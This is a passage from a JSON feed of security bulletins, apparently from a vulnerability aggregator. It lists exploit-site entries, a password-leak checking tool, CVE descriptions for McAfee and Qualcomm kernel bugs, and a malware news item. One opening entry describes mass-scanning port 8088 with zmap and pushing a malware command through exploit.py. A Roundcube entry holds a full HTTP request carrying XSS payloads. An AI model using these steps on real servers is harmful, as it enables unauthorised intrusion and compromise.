8088)\rOk so the web application attack has 2 steps.\r1: Create a new application (done with post request to /newappication),\r2: Now once we done that we can execute commands inside of it.#### Usage Info\n1) You need to scan ip list with zmap:\rzmap -p8088 -o list\r 2) Send the malware cmd (edit the exploit.py with your malware cmd):\rpython exploit.py list\n\nThis is private exploit. You can buy it at https://0day.today", "edition": 1, "reporter": "zeusoid", "published": "2018-09-19T00:00:00", "title": "Radan-http service for Linux remote code execute Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-09-19T23:39:35", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-09-19T00:00:00", "id": "1337DAY-ID-31128", "href": "https://0day.today/exploit/description/31128", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": ""}, {"lastseen": "2018-09-19T23:39:41", "references": [], "description": "Exploit for linux platform in category web applications", "edition": 1, "reporter": "Fahimeh Rezaei", "published": "2018-09-19T00:00:00", "title": "Roundcube rcfilters plugin 2.1.6 - Cross-Site Scripting Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-09-19T23:39:41", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-16736"], "modified": "2018-09-19T00:00:00", "id": "1337DAY-ID-31129", "href": "https://0day.today/exploit/description/31129", "sourceData": "# Exploit Title: Roundcube rcfilters plugin 2.1.6 - Cross-Site Scripting\r\n# Exploit Author: Fahimeh Rezaei\r\n# Vendor Homepage: https://plugins.roundcube.net/packages/eagle00789/rcfilters\r\n# Software Link: https://plugins.roundcube.net/packages/eagle00789/rcfilters\r\n# Version: rcfilters plugin v2.1.6\r\n# Tested on: Roundcube version 1.0.5\r\n# CVE : CVE-2018-16736\r\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16736\r\n# https://nvd.nist.gov/vuln/detail/CVE-2018-16736\r\n# https://github.com/eagle00789/RC_Filters/issues/19\r\n \r\n# Details:\r\n# In the rcfilters plugin 2.1.6 for Roundcube, XSS exists via the \r\n# _whatfilter and _messages parameters (in the Filters section of the settings).\r\n \r\n# PoC\r\n \r\nPOST /rc/?_task=settings&_action=plugin.filters-save HTTP/1.1\r\nHost: Target\r\nUser-Agent: Mozilla/5.0 \r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 119\r\nReferer: https://Target/rc/?_action=plugin.filters&_task=settings\r\nCookie: roundcube_sessid=; roundcube_sessauth=\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\n \r\n_token=09bcde247d252364ea55c217c7654a1f&_whatfilter=from]<script>alert('XSS-1')</script>&_searchstring=whatever&_casesensitive=1&_folders=INBOX&_messages=all])<script>alert('XSS-2')</script>\n\n# 0day.today [2018-09-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31129"}], "kitploit": [{"lastseen": "2018-09-19T00:45:34", "references": ["https://github.com/GitHackTools/Leaked"], "description": "[  ](<https://2.bp.blogspot.com/-VR0X8dXrris/W6BSt1I0sHI/AAAAAAAAMg4/tdq8TBSIQdw1Mm2hbR3P-MYfr_TTeps0wCLcBGAs/s1600/Leaked_1.png>)\n\n \n\n\nLeaked? is A Checking tool for Hash codes and [ Passwords ](<https://www.kitploit.com/search/label/Passwords>) and [ Emails ](<https://www.kitploit.com/search/label/Emails>) leaked, uses leakz module from [ Aidan Holland ](<https://twitter.com/thehappydinoa>) , and leakz module uses API from [ Aurelius Wendelken ](<https://twitter.com/webtobesocial>) . \n\nLeaked? can work in any OS if they have support Python 3 and 2. \n\n \n** What's new? ** \n\n\n * Check email leaked \n * Update \n * More friendly for users \n * Support Python 2 and 3 \n \n** Features ** \n\n\n * Check passwords leaked \n * Check hash code leaked \n * Check email leaked NEW! \n * Update NEW! \n * Exit \n * About Author \n \n** Install and Run in Linux ** \n\n \n \n sudo apt update && apt install python3 python3-pip\n git clone https://github.com/GitHackTools/Leaked\n cd Leaked\n pip3 install -r requirements.txt\n pip install -r requirements.txt\n python3 leaked.py\n\nor ` python leaked.py ` \n \n** Install and Run in Windows ** \nDownload and run Python 3 setup file from [ Python.org ](<https://python.org/>) . In ** Install Python 3 ** , enable ** Add Python 3.7 to PATH ** and ** For all users ** \nDownload and run Git setup file from [ Git-scm.com ](<https://git-scm.com/>) , choose ** Use Git from [ Windows ](<https://www.kitploit.com/search/label/Windows>) Command Propmt ** . \nAfter that, Run Command Propmt or [ PowerShell ](<https://www.kitploit.com/search/label/PowerShell>) and enter this commands: \n\n \n \n git clone https://github.com/GitHackTools/Leaked\n cd Leaked\n pip install -r requirements.txt\n python leaked.py\n\n \n** Update Leaked?: ` git pull -f ` ** \n \n** Notes ** \nLeaked? uses leakz module from [ Aidan Holland ](<https://twitter.com/thehappydinoa>) , and leakz module uses API from [ Aurelius Wendelken ](<https://twitter.com/webtobesocial>) \nLet follow their [ Twitter ](<https://www.kitploit.com/search/label/Twitter>) account! \n \n** Screenshots ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-FE7DIcsxapc/W6BTBehXPnI/AAAAAAAAMhA/ljm85h9Dwcw9397Js7j86jah9u9UOpt2gCLcBGAs/s1600/Leaked_2.png>)\n\n \n\n\n[  ](<https://2.bp.blogspot.com/-jGehiqnIlKU/W6BTBojRutI/AAAAAAAAMhE/EXzpijidJmgIv9WrQ0cH5Folfldi1NZNQCLcBGAs/s1600/Leaked_3.png>)\n\n \n\n\n[  ](<https://3.bp.blogspot.com/-VR0X8dXrris/W6BSt1I0sHI/AAAAAAAAMg8/mEdWbIb-zRUKuyPFGJJsVAJf6TIai2NYwCEwYBhgL/s1600/Leaked_1.png>)\n\n \n** Contact to Author ** \n\n\n * Twitter: [ @SecureGF ](<https://twitter.com/SecureGF>)\n * Facebook: [ @GitHackTools ](<https://githacktools.blogspot.com/>)\n * Google Plus: [ +TVT618 ](<https://plus.google.com/+TVT618>)\n \n\n\n** \n** ** [ Download Leaked ](<https://github.com/GitHackTools/Leaked>) **\n", "edition": 1, "reporter": "KitPloit", "published": "2018-09-18T21:03:07", "title": "Leaked? 2.0 - A Checking Tool For Hash Codes, Passwords And Emails Leaked", "type": "kitploit", "enchantments": {"score": {"modified": "2018-09-19T00:45:34", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "tools", "cvelist": [], "modified": "2018-09-18T21:03:07", "toolHref": "https://github.com/GitHackTools/Leaked", "id": "KITPLOIT:1675384390046332051", "href": "http://www.kitploit.com/2018/09/leaked-20-checking-tool-for-hash-codes.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2018-09-19T11:59:35", "references": ["https://kc.mcafee.com/corporate/index?page=content&id=SB10248"], "description": "An unprivileged user can delete arbitrary files on a Linux system running ENSLTP 10.5.1, 10.5.0, and 10.2.3 Hotfix 1246778 and earlier. By exploiting a time of check to time of use (TOCTOU) race condition during a specific scanning sequence, the unprivileged user is able to perform a privilege escalation to delete arbitrary files.", "edition": 1, "reporter": "NVD", "published": "2018-09-18T17:29:04", "title": "CVE-2018-6693", "type": "cve", "enchantments": {"score": {"modified": "2018-09-19T11:59:35", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-6693"], "scanner": [], "modified": "2018-09-18T17:29:04", "cpe": [], "id": "CVE-2018-6693", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6693", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-09-19T11:59:31", "references": ["https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=e359db47f1e334886eaaf1d71a4754dd312be01c", "https://www.codeaurora.org/security-bulletin/2018/09/04/september-2018-code-aurora-security-bulletin"], "description": "In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, lack of length validation check for value received from firmware can lead to buffer overflow in WMA handler.", "edition": 1, "reporter": "NVD", "published": "2018-09-18T14:29:08", "title": "CVE-2018-11869", "type": "cve", "enchantments": {"score": {"modified": "2018-09-19T11:59:31", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-11869"], "scanner": [], "modified": "2018-09-18T14:29:08", "cpe": [], "id": "CVE-2018-11869", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11869", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-09-19T11:59:31", "references": ["https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=92fbe31eb6b356a1f673515cb1e63b6eaf245143", "https://www.codeaurora.org/security-bulletin/2018/09/04/september-2018-code-aurora-security-bulletin"], "description": "In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, improper check In the WMA API for the inputs received from the firmware and then fills the same to the host structure will lead to OOB write.", "edition": 1, "reporter": "NVD", "published": "2018-09-18T14:29:07", "title": "CVE-2018-11852", "type": "cve", "enchantments": {"score": {"modified": "2018-09-19T11:59:31", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-11852"], "scanner": [], "modified": "2018-09-18T14:29:07", "cpe": [], "id": "CVE-2018-11852", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11852", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-09-19T11:59:31", "references": ["https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=7a8639875bb01bca2dcac7bda9e5d986fbf8683f", "https://www.codeaurora.org/security-bulletin/2018/09/04/september-2018-code-aurora-security-bulletin"], "description": "In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, a potential buffer over flow could occur while processing the ndp event due to lack of check on the message length.", "edition": 1, "reporter": "NVD", "published": "2018-09-18T14:29:07", "title": "CVE-2018-11860", "type": "cve", "enchantments": {"score": {"modified": "2018-09-19T11:59:31", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-11860"], "scanner": [], "modified": "2018-09-18T14:29:07", "cpe": [], "id": "CVE-2018-11860", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11860", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-09-19T11:59:31", "references": ["https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=33abba90b5c570a8334110ff7e1f696908465fd3", "https://www.codeaurora.org/security-bulletin/2018/09/04/september-2018-code-aurora-security-bulletin"], "description": "In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, lack of check of input received from firmware to calculate the length of WMA roam synch buffer can lead to buffer overwrite during memcpy.", "edition": 1, "reporter": "NVD", "published": "2018-09-18T14:29:07", "title": "CVE-2018-11863", "type": "cve", "enchantments": {"score": {"modified": "2018-09-19T11:59:31", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-11863"], "scanner": [], "modified": "2018-09-18T14:29:07", "cpe": [], "id": "CVE-2018-11863", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11863", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-09-19T11:59:31", "references": ["https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-3.0/commit/?id=8a0be9d79cfaa4c4df2695023ba518c540381e80", "https://www.codeaurora.org/security-bulletin/2018/09/04/september-2018-code-aurora-security-bulletin"], "description": "In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, lack of length validation check for value received from firmware can lead to buffer overflow in nan response event handler.", "edition": 1, "reporter": "NVD", "published": "2018-09-18T14:29:07", "title": "CVE-2018-11868", "type": "cve", "enchantments": {"score": {"modified": "2018-09-19T11:59:31", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-11868"], "scanner": [], "modified": "2018-09-18T14:29:07", "cpe": [], "id": "CVE-2018-11868", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11868", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackread": [{"lastseen": "2018-09-18T23:45:28", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "By [Waqas](<https://www.hackread.com/author/hackread/>)\n\nXbash is an \"all in one\" malware. Palo Alto Networks\u2019 Unit 42 researchers have come to the conclusion that the notorious Xbash malware that has been attacking Linux and Windows servers is being operated by the Iron Group which is an infamous hacker collective previously involved in a number of cyber crimes involving the use [\u2026]\n\nThis is a post from HackRead.com Read the original post: [Linux & Windows hit with disk wiper, ransomware & cryptomining Xbash malware](<https://www.hackread.com/linux-windows-disk-wiper-ransomware-cryptomining-xbash-malware/>)", "reporter": "Waqas", "published": "2018-09-18T15:18:01", "type": "hackread", "title": "Linux & Windows hit with disk wiper, ransomware & cryptomining Xbash malware", "enchantments": {"score": {"modified": "2018-09-18T23:45:28", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-09-18T15:18:01", "id": "HACKREAD:16061AA556D4F3998C8F9400A8F49917", "href": "https://www.hackread.com/linux-windows-disk-wiper-ransomware-cryptomining-xbash-malware/", "cvss": {"score": 0.0, "vector": "NONE"}}]}
